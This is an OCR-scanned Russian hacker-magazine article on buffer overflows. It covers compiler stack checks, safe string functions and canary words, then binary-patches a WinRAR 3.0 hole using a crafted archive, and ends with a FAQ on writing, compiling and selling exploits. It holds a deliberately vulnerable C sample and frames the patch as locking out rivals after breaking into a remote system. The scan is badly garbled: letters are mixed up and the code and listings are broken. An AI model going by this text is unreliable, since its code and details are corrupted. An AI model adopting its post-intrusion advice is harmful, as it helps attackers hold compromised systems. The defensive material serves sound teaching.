полнения стека? Нужно только пра- 
вильно их настроить. Для примера 
возьмем компилятор MS VC++ 7.0 из 
пакета MS Visual Studio.NET. Откроем 
окно свойств проекта и выберем 
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Configuration Properties => C/C++ => 
Code Generation, установим Buffer 
Security Check в "Yes". Теперь при no- 
пытке переполнения массива работа 
программы будет прерываться, и ха- 
Kep, вызвавший переполнение, смо- 
жет любоваться красивым окошком 
(см. скрин). 

Правда, от переполнения динами- 
ческих буферов эта настройка не спа- 
сает. К тому же, при включенном конт- 
роле переполнения массивов генери- 
руется более громоздкий и медлен- 
ный код. Увы! Ради безопасности при- 
ходится чем-то жертвовать :-(. Нуж- 
ные настройки компилятора обычно 
описаны в документации к нему. 

Кстати, разработчики компиляторов 
давно хотят сделать автоматическую 
проверку не только для массивов, но 
и для указателей вообще. Но пока 
что не очень успешно. Например, су- 
ществует заплатка для gcc, которая 
позволяет полностью реализовать 
проверку указателей. Результат - па- 
дение скорости и увеличение генери- 
руемого кода примерно в 20-30 раз! 
Согласись, это не самое оптимальное 
решение. 


ОСТОРОЖНО! В БУФЕРЕ 
ДЛИННАЯ СТРОКА 

и Многие дыры в софте - результат 
неправильной обработки длинных 
строк. Программисты или не понима- 
ют, что может случиться из-за пере- 
полнения стека строкой, или так спе- 
шат сляпать и продать очередную 
версию своего продукта, что забыва- 
ют о безопасности. В итоге, имеем ва- 


гон и маленькую тележку супер-пупер 
крутых приложений, которые загиба- 
ются от одной строчки. А между тем 
защитить буфер (любой, не только 
тот, что находится в стеке) от слиш- 
ком длинной строки очень просто! 
Как? Читай дальше. Для начала напи- 
шем небольшое приложение. Откро- 
ем MS VC++ 7.0, создадим консольное 
приложение с именем Overflow и в 
overflow.cpp набьем вот что: 


#include <windows.h> 
#include <stdio.h> 
int overflow_proc(char* big) { 
char buff[10]; 
strcpy(buff, big); 

n 0; } 
int main() { 

char big[255]; 

puts("Enter string:"); 
gets(big): 
0 
р 


verflow_proc(big); 
uts("No overflow ;-)"); 
return 0; } 


Этот исходник - своего рода класси- 
ка. Он упоминается практически во 
всех статьях про переполнения буфе- 
ра, и чаще всего именно на нем юные 
хакеры оттачивают свое умение пи- 
сать эксплоиты ;-). Отключим автома- 
тический контроль переполнения сте- 
ка и откомпилируем исходник. Запус- 
тим overflow.exe. Теперь, если по зап- 
pocy "Enter string:" ввести строку 
длиннее 10 символов, приложение вы- 
летит с ошибкой. 

Аварийное завершение происхо- 
дит по очень простой причине: в 
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процедуре overflow_proc строка ко- 
пируется из big в buff с помощью 
стандартной функции strcpy. Проб- 
nema в том, что strcpy не проверяет, 
помещается ли строка в buff, и зати- 
рает стековый фрейм. Как этого из- 
бежать? Тут есть два пути. Во-пер- 
вых, прежде чем копировать строку 
в буфер, можно просто проверить 
ее длину. Если она больше размера 
буфера, то не копировать ее вооб- 
ще. Проверку можно организовать, 
например, так: 


int overflow_proc(char* big) { 
char buff[10]; 
if(strlen(big)<10) { 
strcpy(buff, big); 
} else 
{ // а-а-ааа! спасите, взламывают! 
puts("Overflow attack detected!"): 
}; return 0; } 


Второй путь - использовать безо- 
пасные функции. В С++ многие стан- 
дартные функции не проверяют дли- 
ну строки. Это касается, например, str- 
cpy, gets, sprintf. Поэтому вместо них 
лучше использовать безопасные ана- 
логи: strncpy, fgets, snprintf. При ис- 
пользовании безопасной строковой 
функции программист должен в пара- 
метрах передать максимальный раз- 
мер строки: 


int overflow_proc(char* big) { 
char buff[10]; 
strncpy(buff, big, 9); 
return 0; } 


Если строка в big будет больше 9 байт, 
в buff скопируются только первые 9 
байт из big. Остальная часть строки 
("хвост") будет обрезана без каких-либо 
предупреждений. Кстати, о безопасных 
функциях. В нашем примере, если хакер 
введет больше 255 символов, опять 
возникнет переполнение, но уже в бу- 


qpepe big. Так что лучше в функции 
main заменить gets на безопасную fgets: 


int main() { 
char big[255]; 
FILE *stream = fopen("CON:", "г"); 
puts("Enter string:"); 
fgets(big, 254, stream); 
overflow_proc(big); 
return 0; } 


Hy, вот вроде бы и все, теперь наше 
приложение может себя защитить. 
Правда несложно? Едем дальше. 


А ЕСЛИ НЕ CTPOKA?.. 

ш Действительно, а что если в бу- 
(Pep заносится не строка с заверша- 
ющим нулем, а просто цепочка байт? 
Данные произвольной структуры, 
среди которых вполне может ока- 
заться пара-тройка нулей? Совет тут 
один - проверяй длину данных самос- 
тоятельно. 

Есть два общих правила, срабаты- 
вающих в 99% случаев. Первое. 
Многие функции, с помощью кото- 
рых производится чтение в буфер, 
позволяют задавать количество чи- 
таемых байт. Следи, чтобы это коли- 
чество не превысило размер буфе- 
ра! Например, ты считываешь дан- 
ные из файла с помощью API _lread 
в буфер величиной 255 байт. Всегда 
проверяй, чтобы последний пара- 
метр _Iread был не больше этого 
значения. Второе. Если длину дан- 
ных нельзя задать явно - ее можно 
узнать с помощью какой-то специ- 
альной функции! Например, ты чита- 
ешь из сокета с помощью АР! recv. 
Чтобы узнать количество байт, ис- 
пользуй API ioctlsocket. Другой при- 
мер: ты преобразовываешь обыч- 
ную строку в UNICODE. Чтобы y3- 
нать, какой буфер для этого понадо- 
бится, вызови API 
MultiByteToWideChar с нулевым пос- 


Минзорав предупрежсщает: чтение 
толковой документации вызывает 
привыкание! :) 


НЕМНОГО ЭКЗОТИКИ: НЕИСПОЛНЯЕМЫЙ СТЕК 


Ш Кроме элементарных приемов защиты, существуют и более на- 
вороченные техники. Одна из них - неисполняемый стек. О нем я 
расскажу лишь вкратце. Идея состоит в присваивании сегментам 
стека и данных атрибуты только записи и чтения. Это позволяет за- 
щитить приложение от внедрения исполняемого кода, но не спаса- 
ет от других видов атак (например, от подделки структур). Неиспол- 
няемый стек также плохо совместим с компиляторами и интерпре- 
таторами, которые часто генерируют и выполняют код динамичес- 
ки. Существует несколько реализаций неисполняемого стека в ви- 
де патчей к OC Solaris и Linux, Ho все они не очень удачны. Вот, по- 


жалуй, и все. 


ледним параметром. Примеров мож- 
но привести много. Думай головой и 
не ленись заглядывать в MSDN. 


СЛОВО ПРЕДОСТАВЛЯЕТСЯ 
КАНАРЕЙКЕ, ИЛИ ЧТО ДЕЛАТЬ, 
ЕСЛИ НИЧЕГО НЕ ПОМОГЛО 

Но теперь предположим такую ситу- 
ацию. Допустим, перед записью в бу- 
сфер ты почему-то не можешь явно за- 
дать или проверить длину данных. 
Что тогда? Оставить дырку, надеясь, 
что ее никогда не найдут? 

При таком раскладе я могу тебе по- 
советовать простой способ защиты. 
Его называют защитой на основе 
canary word. Суть его вот в чем: еще 
при объявлении буфера его делают 
на 4 байта больше. "Лишние" 4 байта 
в конце буфера используются для 
контроля его целостности. Перед тем 
как записывать что-пибо в Oycpep, ге- 
нерируется случайное двойное слово - 
так называемое Canary word, которое 
заносится одновременно в глобаль- 
ную переменную и в последние 4 бай- 
та буфера. Теперь, если при записи в 
буфер произойдет переполнение, 
canary word в конце буфера будет 3a- 
терто кодом эксплоита. Иллюстрацию 
этого ты можешь увидеть на скрине. 

Глобальная переменная при этом не 
пострадает. Так что после записи в бу- 
сфер достаточно сравнить Canary word 
в глобальной переменной с сапагу 
word в буфере. Совпадают - все ok, 
нет - буфер переполнен, ахтунг! 

Теперь возьмем то несчастное прило- 
жение, которое мы пытались уберечь 
от переполнения строкой. Чтобы защи- 
тить буфер с помощью Canary word, 
достаточно добавить пару строчек в ис- 
ходный код уязвимой процедуры: 


static DWORD CanaryWord; 

int overflow_proc(char* big) { 
char buff[10+4]; 
CanaryWord = GetTickCount(); 
*((DWORD*)&buff[11]) = CanaryWord; 
strcepy(buff, big): 

if(*((DWORD*) &buff[11])!=CanaryWord) { 
MessageBox(0, "Buffer overflow detected!", \ 

"Warning!", MB_OK+MB_ICONWARNING); 
ExitProcess(0); 
} return 0; } 


Переполнение стека идет от нижних 
адресов к верхним (вдоль желтой 
стрелки). По дороге к адресу возврата 
код эксплоита затирает canary word 


К сожале- 
нию, уни- 
версального 
способа 
проверки 
длины дан- 
ных произ- 
вольной 
структуры, 
заносимых 
в буфер, не 
существует 


Зачем гене- 
рить сапагу 
word слу- 
чайно? За- 
тем что, ес- 
ли сапагу 
word будет 
какой-то 
жестко за- 
данной 
константой, 
хакер смо- 
жет нако- 
дить 
эксплоит, в 
котором по 
заранее 
рассчитан- 
ному сме- 
щению бу- 
дет лежать 
эта конс- 


танта. 


Многие раз- 
работчики 
не учитыва- 
ют элемен- 
тарных ве- 
щей, и спи- 
сок дырок 
растет с 
каждым 
днем. 
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Впервые за- 
щита на ос- 
нове сапагу 
word была 


реализована 
в проекте 
Synthetix в 
виде опции 
компилято- 
ра. Размер 
буферов 
при сборке 
корректиро- 
вался авто- 
матически, 
проверки 
встраива- 
лись в гене- 
рируемый 
код. 


Большой 
плюс защи- 
ты на осно- 
ве сапагу 
word в том, 
что она 
универсаль- 
на и может 
применять- 
ся для за- 
щиты любо- 
го буфера, 
где бы он 
ни находил- 
ся. Кроме 
того, эта 
техника 
почти не 
замедляет 
работу 
программы. 


Научившись 
закрывать 
дыры в чу- 
жих прог- 
раммах, ты 
переста- 
нешь зави- 
сеть от раз- 
работчиков. 
Обнаружив 
уязвимость 
в каком-ни- 
будь прило- 
жении, ты 
сможешь 
сам напи- 
сать зап- 
латку. 


ЗАЩИТИСЬ И ЗАМЕТИ! ) 


Как видишь, все элементарно. Сна- 
чала получаем canary word. Для этого 
используем API GetTickCount, которая 
возвращает количество MUKPOCeKYHG, 
прошедших с момента включения 
компьютера. Это значение, конечно, 
не случайное, но предсказать его за- 
ранее абсолютно точно почти нере- 
ально. Затем Canary word заносится в 
глобальную переменную CanaryWord 
и в последние 4 байта буфера. Произ- 
водится чтение в буфер. Сразу после 
чтения, go return, сравнивается 
CanaryWord и последние 4 байта в бу- 
qpepe. Если результат сравнения по- 
ложительный - буфер не переполнен. 
Если отрицательный - выдадим сооб- 
щении о возможной атаке и завер- 
шим работу программы. Для заверше- 
ния используем API ExitProcess. Этот 
и другие исходники к первой части ты 
можешь найти на диске, прилагаю- 
щемся к журналу. Вот и все :-). 


5 ПРАВИЛ БЕЗОПАСНОГО 
ПРОГРАММИРОВАНИЯ 

m Отпечатать крупными буквами и 
повесить над монитором! 

@. Перед тем как скопировать стро- 
ку в буфер, проверяй ее длину. 

@. Везде, где только можно, поль- 
зуйся безопасными функциями для 
работы со строками. 

@. Проверяй или явно указывай 
длину данных, которые записываешь 
в буфер. 

@. Если проверить или явно указать 
длину данных нельзя - контролируй 
переполнение с помощью сапагу 
word. 

©. Думай головой, a не... [вырезано 
цензурой]. 


ЧАСТЬ 2. 
НЕ ЗАБЫВАЙТЕ ЗАКРЫВАТЬ ЗА 
СОБОЙ... ДВЕРИ. DO IT! 


ЗАЧЕМ НАМ ЭТО НАДО? 

м Что за топот?.. Это разработчики 
прочитали первую часть и побежали 
писать безопасные программы ;-). Ос- 
тались только мы с тобой. Что x, те- 
перь можно расслабиться и погово- 
рить о чем-то приятном. Например, о 
том, как закрыть уязвимость в прог- 
рамме, не имея ее исходников. Допус- 
тим, ты написал эксплоит и успешно 
атаковал удаленную систему. Теперь 
у тебя над ней полный контроль. Что 
дальше? А дальше первым делом 
нужно избавиться от возможных кон- 
курентов. Ведь дыра, через которую 
ты влез, никуда не делась! Через нее 
следом за тобой может спокойно 
влезть еще кто-то. Или ее найдет си- 
садмин той же удаленной системы. Те- 
бе это надо? Нет! Значит нужно дыру 
закрыть. 

Каждая дырка, найденная в чужой 
программе, требует тщательного ис- 
следования и творческого подхода. 
Поэтому, если хочешь чему-то нау- 
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читься, нужно практиковаться. Вот мы 
сегодня и попрактикуемся. А в качест- 
ве жертвы выберем наиболее попу- 
лярный архиватор... Что значит ка- 
кой? Конечно, WinRAR! Для работы 
нам понадобятся ЗоН-се, IDA и HIEW. 


ИССЛЕДОВАНИЕ WINRAR 3.0 

ш Известно, что WinRAR версий 3.1 
и ниже уязвим. Если подсунуть ему 
архив, в котором содержится файл с 
расширением, содержащим больше 
260 символов, можно вызвать пере- 
полнение буфера. Переполнение 
происходит в модуле winrar.exe при 
попытке отобразить содержимое та- 
кого архива в ListView. Причина - не- 
корректная обработка длинных 
строк. Типичный строковой overflow. 
Что ж, возьмем WinRAR 3.0 rus и 
попробуем закрыть эту уязвимость. 
Сначала нужно исследовать 
winrar.exe и найти адрес уязвимой 
процедуры. На всякий случай сперва 
ищем в инете: может, кто-то уже ис- 
следовал дыру и опубликовал ре- 
зультаты. Тогда нам останется толь- 
ко ознакомиться с этими результата- 
ми и написать патч. Но, увы, security- 
порталы ограничиваются лишь об- 
щими замечаниями и советами :(. 
Придется выковыривать адрес уяз- 
вимости самим. Зато здесь: 
http://www.securityfocus.com/data/vulnerabili- 
ties/exploits/wrar3i0.zip нам удается ска- 
чать архив с утилитой, которую вир- 
мейкерская группа 29А написала 
специально для генерации "кривых" 
ВАБ-архивов, вызывающих перепол- 
нение. Также в wrar3i0.zip, кроме са- 
мой утилитки, есть сгенерированный 
ею пример - файл 29А.КАК. Прекрас- 
но! Теперь хоть не придется изучать 
внутренний формат файлов .RAR и 
делать "кривой" архив в НЕХ-редак- 
торе вручную. Приступим. Запустим 
cmd.exe и посмотрим содержимое ар- 
хива 29A.RAR с помощью гаг.ехе (не 
бойся, гаг.ехе можно пользоваться 
спокойно - он без дырок). Наберем в 
командной строке: rar | 29A.RAR. 
Видно, что в 29A.RAR содержится 
один файл нулевой длины с именем 


Переполнение стека в WinRAR 3.0 rus 


"АААААА.} YIQhmeu!hera hcu shSeu 
T...""- ну, дальше сам посмотришь, 
все-таки там расширение больше 
260 байт ;-). 

Теперь запустим winrar.exe. Попро- 
буем открыть 29A.RAR... Опа! До боли 
знакомое окошко! 

Запомним "аварийный" адрес 
0x486723, закроем WinRAR. С по- 
мощью Symbol Loader загрузим win- 
rar.exe в Soft-Ice. Symbol Loader ма- 
тюгнется на отсутствие отладочной 
информации, но winrar.exe загрузит. 
Поставим брэйкпоинт и выйдем из от- 
ладчика: 


‘bpx 486723 
x 


Снова попробуем открыть 29A.RAR. 
Брэйкпоинт срабатывает, всплывает 
окно отладки. EIP указывает на 
инструкцию 001В:00486723 | ADD 
[EAX],AL. Именно она приводит к ава- 
рийному завершению. Поскольку мы 
имеем дело с переполнением стека, 
управление на эту "смертельную" 
инструкцию, скорее всего, передается 
инструкцией ге{. Посмотрим, какое 
слово лежало Ha стеке Henocpeg- 
ственно перед тем, как ret выполни- 
лась (поскольку мы имеем дело со 
стеком, у тебя вместо Ox00125A68 
вполне может быть какой-то другой 
адрес): 


:dd esp-4 

0010:00125А68 | 0048671A 00127086 
00127080 00128DE0 | .gH..p..p.. 
0010:00125А78 | 00000000 00127086 
00125BA0 00447202 |....p..[..D 
Получается, что управление передается 
на адрес 0x00486/71A. Посмотрим, что 
лежит по этому адресу (:и 486 1А). 

В окне кода видим: 


001B:00486/71A | ADD EAX, 00000000 


Заполняя Oycpep, осторожен Oydb. 
Пара лишних байтов - к Overflow путь! 


abe мах 


Аи 1.09 Вычар-: 
№ ign ый Грыравашна 


т mb 


`Результат работы rar | 29A.RAR 


larewed Powas ia 
itt i пара 


Ранее мы уже выяснили, что к ава- 
рийному завершению приводит 
инструкция по адресу Ox00486723. 
Теперь мы знаем, что перед ней вы- 
полняются еще три инструкции. Уже 
кое-что... Выйдем из отладчика и по- 
думаем (WinRAR тем временем опять 
завалится ;-)). Фактически причиной 
передачи управления на Ox0048671A 
является двойное слово, записанное 
по адресу ОхО0125А68. Значит, нужно 
отловить инструкцию, которая это 
двойное слово туда записывает. 
Опять загружаем winrar.exe в Soft-lce. 
Ставим брейкпоинт на память 
0х00125А68 :bpm 00125A68. Ого! На 
этом брейкпоинте WinRAR постоянно 
вылетает в отладку. И это он еще да- 
же окно не успел создать! Воистину 
программы на С++ много работают со 
стеком. Временно отключим постав- 
ленный брейкпоинт: :bd * , подведем 
курсор к 29A.RAR, включим постав- 
ленный брейкпоинт - :be *. Попытаем- 
ся открыть 29А.КАК. Каждый раз, ког- 
да будет всплывать окно отладчика (а 
таких разов будет больше десятка), 
будем проверять, не записано ли по 
адресу Ox00125A68 двойное слово 
0x0048671A - :dd 00125A68. В конце 
концов мы поймаем некую инструк- 
цию по адресу Ox0047366A: 


Она и заносит в OxO0125A68 интере- 
сующее нас двойное слово. Посмот- 
рим на пойманный код. Похоже на 
внутренности какой-то строковой 
НЁ--функции, правда? Запомним ag- 
рес 0x0047366A и на всякий случай 
нажмем F12. Если адрес ОхОО47366А - 
действительно часть функции, нужно 
узнать, откуда ее вызвали. Остановка 
происходит на адресе Ox00453D69: 


Запомним и его тоже. Отключим все 
брейкпоинты и выйдем из отладки. Заг- 
рузим WinRAR в IDA. Пока IDA ero gu- 
зассемблирует, пойдем попьем пива. 

Когда вернемся, посмотрим, куда 
указывает адрес 0x0047366A. А он 
указывает в середину функции срав- 
нения строк. Разберемся, как она ра- 
ботает. 

Функция сначала находит длину 
строки, которую нужно скопировать. 


«beat , BUASICas 


Затем с помощью двух последова- 
тельных сдвигов на 1 бит вправо наце- 
ло делит эту длину на 4 - получается 
размер строки, выраженный в двой- 
ных словах. Правда, полученный раз- 
мер обязательно кратен 4, поэтому, 
если длина строки не делится нацело 
на 4, теряется остаток ("хвостик" 
строки в 1, 2 или 3 байта длиной). Про- 
исходит копирование строки двойны- 
ми словами; его выполняет инструк- 
ция по адресу Ox0047366A. Затем 
функция путем обнуления старших 
ЗО битов есх находит остаток от деле- 
ния длины строки на 4 (потерянный 
при предыдущем копировании "хвос- 
тик") и копирует его уже побайтно. Та- 
кой идиотский, на первый взгляд, код 
генерируется компилятором С++ для 
увеличения скорости. 

Заметим, что функция никак не конт- 
ролирует длину копируемой строки - 
отсюда, очевидно, и переполнение бу- 
сфера. Теперь посмотрим в IDA код, ко- 
торый вызвал эту процедуру перед 
аварийным завершением программы. 
Идем на адрес Ox00453D69 (мы его 
выловили отладкой, помнишь?) и ви- 
дим там вот что: 


В CODE XREF - единственная ссылка. 
Кликаем по ней, приходим к следую- 
щему: 


Смотрим CODE XREF - шесть ссылок. 
Что ж, не так и много. Вполне можно 
проверить на отладке. Загружаем 
WinRAR в Soft-Ice, ставим и временно 
отключаем брейкпоинт: 


WinRAR загрузился, подводим кур- 
cop к 29A.RAR, включаем брейкпоинт. 


совсем re reer 


mal сан. Che 


Это стоит проверить на отладке 


Открываем архив. При каждом всплы- 
вании Soft-lce смотрим на стек и запо- 
минаем адрес, откуда пришел вызов. 
После тринадцатого всплывания Soft- 
Ice происходит аварийное заверше- 
ние. Адрес вызова ОхОО45ЗСЕА. 
Опять идем в IDA. Видим процедуру: 


ДИЗАССЕМБЛИРОВАННЫЙ РАР 
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К сожале- 
нию, уни- 
версального 
способа за- 
тыкания 
уязвимос- 
тей нет. 


Копирова- 
ние двойны- 
ми словами 
происходит 
намного 
быстрее ко- 
пирования 
по байту. 


oun 


Специально 
для любите- 
лей оптими- 
зации: код 
патча мож- 
но умень- 
шить, по 
крайней ме- 
ре, на 5 
байт, если 
по адресу 
0х00453СЕ 
5 заменить 
jmp ua call. 
Как? Поп- 
робуй ра- 
зобраться 
самостоя- 
тельно :-). 


ЗАЩИТИСЬ И ЗАМЕТИ! ) 


.text:00453CD6 уаг_104 = dword ptr -104h 
.text:00453CD6 SubKey = byte ptr -100h 
.text:00453CD6 

.text:00453CD6 push ebx 

.text:00453CD7 add esp, -104h; <-- резерви- 
pyem буфер (260 байт!) 

.text:00453CDD mov ebx, eax 
.text:00453CDF lea ecx, [esp+104h+SubKey] 
.text:00453CE3 mov eax, ebx 
.text:00453CE5 call sub_453D20; <-- копиро- 
вание строки 

.text:00453CEA push esp 

.text:00453D05 add esp, 104h 
.text:00453D0B pop ebx 
.text:00453D0C retn; <-- управление 
отдается на 0048671A 


Загрузим WinRAR в Soft-Ice, поста- 
вим и отключим брейкпоинт на 
00453CD6, это начало процедуры. Пе- 
ред открытием 29A.RAR включим 
брейкпоинт. При первом срабатыва- 
нии трассируем код go Ox00453CDD, 
запоминаем адрес выделенного бу- 
фера и снимаем брейкпоинт. Потом 
ставим брейкпоинт на OX00453CEA. 
Он будет срабатывать каждый раз, 
сразу после того как инструкция по 
адресу Ox00453CE5 вызвала проце- 
дуру копирования строки. Смотрим, 
что скопировалось в буфер. В конце 
концов в буфере оказывается наше 
длинное расширение ;-). Нажимая [Е 10, 
трассируем процедуру до адреса 
0х0045300С и останавливаемся. 
Смотрим esp. Он указывает на двой- 
ное слово Ox0048671A. Вот мы и наш- 
ли уязвимость. 


ЗАТЫКАЕМ ДЫРУ 

и Впишем в winrar.exe небольшой 
код, на который будет передаваться 
управление с адреса Ox00453CE5. 
Этот код будет проверять длину стро- 
ки перед помещением ее в уязвимый 
буфер. Если проверка длины пройдет 
успешно, управление перейдет прямо 
на функцию по адресу Ox00453D20. 
Если же код обнаружит, что строка 
слишком длинная, он сперва "обре- 
жет" ее, записав по смещению 259 от 
начала нулевой байт, а уже потом 
сделает jmp 004530200. В теории все 
очень красиво. Но на практике нам 
предварительно нужно решить две 
задачи. Первая: как код получит ука- 
затель на строку, которую нужно про- 
верить. Вторая: куда его вписать. Лег- 
ко сказать "вписать код", а куда? Ис- 
ходников-то нету. Первая проблема 
решается с помощью отладчика. Заг- 
рузим winrar.exe в Soft-Ice, поставим 
брейкпоинт на адрес OxO0453CE5. 


001B:00453CE3 | MOV EAX, EBX 
001B:00453CE5 | CALL 00453D20 
001B:00453CEA | PUSH ESP 


Попытаемся открыть 29A.RAR - 
всплывет отладка. Посмотрим, куда 
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указывают регистры. Искомая строка 
очень быстро находится по адресу в 
еах. Вторая проблема - куда деть код - 
также не очень сложна. Впишем его в 
header ЕХЕ-файла. Сначала нужно 
найти свободное место. Загружаем 
winrar.exe в HIEW. Жмем F4, выбираем 
режим отображения НЕХ. Смотрим, по 
какому смещению от 
начала файла лежит 
заголовок РЕ: жмем 
F5, набираем "ЗС". По 
смещению Ox3C видим 
смещение заголовка 
РЕ: 00 02 00 00 (двой- 
ное слово Ox200 на- 
выворот). Проверяем: 
жмем F5, набираем 
"200". Точно, РЕ-сиг- 
натурка на месте ;-). Та- 
ким образом, под DOS 
stub выделены первые 
512 байт winrar.exe. 
Причем в НЕМ! видно, 
что вторая половина 
этого пространства ни- 
как не используется - 
сплошные нулевые 
байты. Что ж, для прог- 
раммиста на ассембле- 
ре 256 байт - это нема- 
ло! Итак, мы нашли место, в которое 
можно вписать код, проверяющий дли- 
ну строки. Теперь дело за самим кодом. 
Он может быть, например, таким: 


; сохраняем в стеке регистры и флаги 
pushad 
pushfd 
; находим длину строки, адрес которой Ha- 
ходится в edx 
mov есх,-1 
mov edi,edx 
хог al,al 
cld 
repne scasb 
not ecx 
; сравниваем найденную длину строки с 259 
cmp есх, 1038 
Ле @@1 
‚ если строка в едх длиннее 259, обрезаем ее 
mov byte ptrfedx+103h],0 
‚ восстанавливаем регистры 
@@I: popfd 
popad 
; выходим, отдаем управление процедуре 
копирования строк 
push 00453CEAh 
jmp 00453D20h 


Ничего оригинального. Единствен- 
ный принципиальный момент состоит 
в том, что перед jmp 004530201 нуж- 
но положить на стек адрес возврата. 
Тогда процедура по адресу 
0x00453D20 будет считать, что уп- 
равление на нее передали с адреса 
0x00453CE5 инструкцией call. Внесем 
этот код в заголовок winrar.exe по 
смещению Ox100. Воспользуемся 
встроенным в HIEW ассемблером. Для 
этого жмем F4, выбираем Decode. По- 
том жмем СЕ+11 - устанавливается 
32-битный режим дизассемблирова- 


ния. Переходим на Ox100 с помощью 
F5. Жмем F3 - включается режим ре- 
дактирования. Теперь мы можем впи- 
сать свой код, нажав F2. Синтаксис 
встроенного в HIEW ассемблера нем- 
ного специфичный, особенно в отоб- 
ражении адресов переходов. Поэтому 
наш код будет выглядеть так: 


КОД ПАЧТА К WINRAR В HIEW 


00000100: 60 pushad 

00000101: 9C pushfd 

00000102: BOFFFFFFFF mov ecx,OFFFFFFFF 
00000107: 8BFA mov edi,edx 

00000109: 32С0 xor al,al 

00000108: FC cld 

0000010C: F2AE repne scasb 

0000010Е: F7D1 not ecx 

00000110: 81F903010000 cmp ecx,000000103 
00000116: ТЕОТ Де 0000001Е 

00000118: С6820301000000 mov b,[edx][000000103),000 
000001Е: 9D popfd 

00000120: 61 popad 

00000121: 68EA3C4500 push 000453CEA 
00000126: E9F53B0500 jmp .000454720 


Теперь остается только изменить 
вызов по адресу Ox00453CE5, чтобы 
он указывал на наш код: 


.00453CE3: 8BC3 mov eax,ebx 
.00453CE5: E916C4FAFF jmp .000453100 
.00453CEA: 54 push esp 


Все. Запускаем winrar.exe, открыва- 
ем 29A.RAR. 

Никакого аварийного завершения, хо- 
тя архив отображается пустым (оно и 


неудивитель- 
но, ведь внут- 
ри он содер- 
жит ошибки, 
из-за которых 
собственно и 


происходило 
переполне- 
WinRAR больше He ние). 
страдает переполне- А как нас- 
нием буфера ;-) чет других 
файлов? 


Советую тебе потестировать про- 
патченный архиватор: создай де- 
сяток-другой архивов, распакуй 
что-то, сделай SFX. Убедись, что 
все в порядке и патч "прижился" 
хорошо ;-). Я тестировал свой про- 
патченный WinRAR около часа - 
ни одного глюка. Кстати, инстал- 
ляцию WinRAR 3.0 rus вместе с 
пропатченным Winrar.exe ты мо- 
жешь найти на диске. Ну вот, те- 
перь у тебя есть некоторый опыт 
закрытия дыр в чужих прогах. Как 
видишь, все оказалось не так-то 
сложно - просто нужно знание ас- 
семблера и много терпения. Ду- 
маю, и то и другое у тебя есть, так 
что особых трудностей не будет. 


Удачных патчей! :-) 


Читай в следующем номере Спеца: 


СКОРО В СПЕЦЕ: 


@ Непреступный *nix 

Так ли уж неприступен *nix, как его малюют? Уязвимости во всех 
популярных сервисах, ядрах и дистрибутивах. Типичные атаки. 
Руткиты. Unix с точки зрения хакера. Чпих-вирусы и черви. 
Защита. 

© Атака на Windows 

Насколько дырявы Винды на самом деле? Уязвимости софте от М$ 
и других производителей, эксплоиты. Бэкдоры, трояны, вирусы и 
черви. Защита для юзера и админа. 


FAQ 


Инструменты мастера 
Обзор сосрта для создания 
SKCNNOUTOB 


Полезная бумага 
Обзор книг по программированию, 
взлому и защите 


МЕВ 


Вкусные ссылки в интернет 


@ SPECial delivery 


FAQ ) 


ВОПРОСЫ 
ХАКЕРА 


© Я хочу написать 
эксплоит, но пока не 


нашел уязвимость в прог- 
рамме. Как мне ее поско- 
рее отыскать? 


Все зависит от знаний 
и опыта. Найти бажную 
функцию - мало, надо 
уметь грамотно выз- 
вать переполнение и 
запустить shell-Kog. Ec- 
ли ты еще не набил в 
этом руку, используй 
утилиты для локально- 
го поиска переполне- 
ний, например, PScan 


( 


2) Ковыряюсь в эксплои- 
те для переполнения 
буфера в CVS. Ho gcc при 
компиляции пишет какую- 
то фигню - говорит об 
ошибках в функциях 
zflush, zgetch и start_gzip. 
Как его скомпилить? 


Этому эксплоиту требу- 
ется поддержка Zlib, 
так как он работает с 
механизмами компрес- 
сии. Используй пара- 
метр -17, и все прекрас- 
но скомпилится. 


coe аа 11 
ett ny 
an а 
a ee gy 


a) Fe "ЗЫ oe ee 
res oo remem В 


Правильная компиляция 
эксплоита 
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© Облазил весь инет, но 
так и не нашел нуж- 
ной программы для поиска 
багов в Ипих-бинарниках. 
Такие программы вообще 
существуют? 


Существуют. Добрые 
хакеры подарили прек- 
расные тулзы для об- 
наружения переполне- 
ний. Одна из них - она 
особенно меня порадо- 
вала - выполнена в ви- 
де sh-ckpunta и назы- 
вается initd_.sh 
( 

ys 
Подбирая параметр к 
указанному бинарнику, 
скрипт настойчиво пы- 
тается переполнить в 
нем буфер. После 
двадцатиминутных игр 
с эксплоитом для 
mod_ssl я нашел в нем 
переполнение. А вам 
слабо? :) 


Говорят, можно зара- 

ботать на эксплоитах. 
Если не секрет, каки 
сколько? 


Сколько попросишь :). 
Можно трэйдить своим 
Одау-эксплоитом на 
IRC. Но, если He бо- 
ишься рипперов, есть 
способ лучше сколо- 
тить состояние. Никто 
не запрещает отписать 
лидерам крупных $еси- 
rity-KoMaHg и попро- 
сить энную сумму тух- 
лых президентов за 
изьян. Если имел место 
реальный баг, тебе не 
только заплатят, но и 
на работу возьмут. 
Проверено. 


(2) В каком софте лучше 
искать переполнения? 


Если ты хочешь потре- 
нироваться в поиске 
уязвимых функций и 
переменных, советую 
взять какой-нибудь 
старенький исходник, 
например, сырец мно- 
гострадального wu- 
ftpd. Пролистай сырец 
по диагонали, найди 
уязвимый кусок кода, 
приложи утилиты для 
поиска оверлоада и... 
сравни свой результат 
с опубликованным в 
багтраке. Результат 
совпал? Спешу тебя 
поздравить: ты настоя- 
щий багоискатель. Ес- 
ли же твоя задача - 
быть первопроходцем и 
найти уязвимость в по- 
пулярном сосфте, бери 
что-нибудь юзаемое и 
бажное одновременно, 
например, исходники 
Proftpd или Named. Ба- 
ги есть везде, главное - 
суметь их найти. 


Я нашел баг в прило- 
© жении и написал 
эксплоит. Все в шоколаде, 
но мне хочется зарелизить 
сплоит и уязвимость. Сто- 
ит ли это делать? 


В принципе, эксплоит 
твой - тебе и решать, 
что с ним делать :). Мо- 
жешь сразу написать 
на staff@packetstorm- 
security.org либо на 
vuln@security.nnov.ru, 
но никакой выгоды, a 
тем более денег ты с 
релиза не получишь. 


учаев Дмитрий aka Forb (forb@real.xakep. 


FAQ 


(2) Какие методики для 
поиска переполнений 
наиболее эффективны? 


Профессионалы реко- 
мендуют анализиро- 
вать исходник на нали- 
чие функций, не прове- 
ряющих границы пере- 
данного буфера. Это 
известные strcpy(), str- 
cat(), gets(), sprintf(), 
scanf() и некоторые 
другие. Осматривай код 
на предмет наличия пе- 
ременных с фиксиро- 
ванным буфером. Их 
всегда можно эксплуа- 
тировать. Также стоит 
обращать внимание на 
функции форматиро- 
ванного ввода. С их по- 
мощью можно сделать 
немало всего интерес- 
